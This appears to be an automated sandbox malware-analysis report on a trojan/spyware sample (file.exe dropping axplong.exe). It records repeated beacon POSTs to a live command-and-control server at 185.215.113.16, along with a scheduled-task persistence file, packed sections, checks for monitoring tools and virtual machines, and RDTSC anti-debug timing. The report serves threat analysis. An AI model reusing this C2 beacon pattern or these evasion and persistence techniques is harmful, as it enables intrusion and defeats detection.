                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
                  Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

                  System Summary

                  Source: file.exeStatic PE information: section name:
                  Source: file.exeStatic PE information: section name: .idata
                  Source: file.exeStatic PE information: section name:
                  Source: axplong.exe.0.drStatic PE information: section name:
                  Source: axplong.exe.0.drStatic PE information: section name: .idata
                  Source: axplong.exe.0.drStatic PE information: section name:
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: file.exeStatic PE information: Section: ZLIB complexity 0.9970516859673024
                  Source: file.exeStatic PE information: Section: hsrzezej ZLIB complexity 0.9945219054562906
                  Source: axplong.exe.0.drStatic PE information: Section: ZLIB complexity 0.9970516859673024
                  Source: axplong.exe.0.drStatic PE information: Section: hsrzezej ZLIB complexity 0.9945219054562906
                  Source: axplong.exe.0.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                  Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/3@0/1
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                  Source: file.exeStatic file information: File size 1936896 > 1048576
                  Source: file.exeStatic PE information: Raw size of hsrzezej is bigger than: 0x100000 < 0x1a7400

                  Data Obfuscation

                  Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hsrzezej:EW;vqlpxtuc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hsrzezej:EW;vqlpxtuc:EW;.taggant:EW;
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 2.2.axplong.exe.bf0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hsrzezej:EW;vqlpxtuc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hsrzezej:EW;vqlpxtuc:EW;.taggant:EW;
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 3.2.axplong.exe.bf0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hsrzezej:EW;vqlpxtuc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hsrzezej:EW;vqlpxtuc:EW;.taggant:EW;
                  Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                  Source: axplong.exe.0.drStatic PE information: real checksum: 0x1e1e2e should be: 0x1de922
                  Source: file.exeStatic PE information: real checksum: 0x1e1e2e should be: 0x1de922
                  Source: file.exeStatic PE information: section name:
                  Source: file.exeStatic PE information: section name: .idata
                  Source: file.exeStatic PE information: section name:
                  Source: file.exeStatic PE information: section name: hsrzezej
                  Source: file.exeStatic PE information: section name: vqlpxtuc
                  Source: file.exeStatic PE information: section name: .taggant
                  Source: axplong.exe.0.drStatic PE information: section name:
                  Source: axplong.exe.0.drStatic PE information: section name: .idata
                  Source: axplong.exe.0.drStatic PE information: section name:
                  Source: axplong.exe.0.drStatic PE information: section name: hsrzezej
                  Source: axplong.exe.0.drStatic PE information: section name: vqlpxtuc
                  Source: axplong.exe.0.drStatic PE information: section name: .taggant
                  Source: file.exeStatic PE information: section name: entropy: 7.980121831672435
                  Source: file.exeStatic PE information: section name: hsrzezej entropy: 7.9531207012657585
                  Source: axplong.exe.0.drStatic PE information: section name: entropy: 7.980121831672435
                  Source: axplong.exe.0.drStatic PE information: section name: hsrzezej entropy: 7.9531207012657585
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeJump to dropped file

                  Boot Survival

                  Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonclassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonclassJump to behavior
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                  Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2614B7 second address: 2614C1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F05ECE231B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2614C1 second address: 2614D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05ECFAD314h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2625E0 second address: 2625ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2625ED second address: 2625F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2627B7 second address: 2627BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2005D5 second address: 200605 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F05ECFAD316h 0x00000008 jmp 00007F05ECFAD30Eh 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007F05ECFAD306h 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26B6E5 second address: 26B6F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 jne 00007F05ECE231B6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 272762 second address: 272767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 272767 second address: 272779 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05ECE231BEh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2777F5 second address: 277808 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F05ECFAD306h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 277808 second address: 27780E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 203C80 second address: 203C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 276436 second address: 276475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jl 00007F05ECE231CEh 0x0000000d jmp 00007F05ECE231C6h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F05ECE231C6h 0x0000001d rdtsc
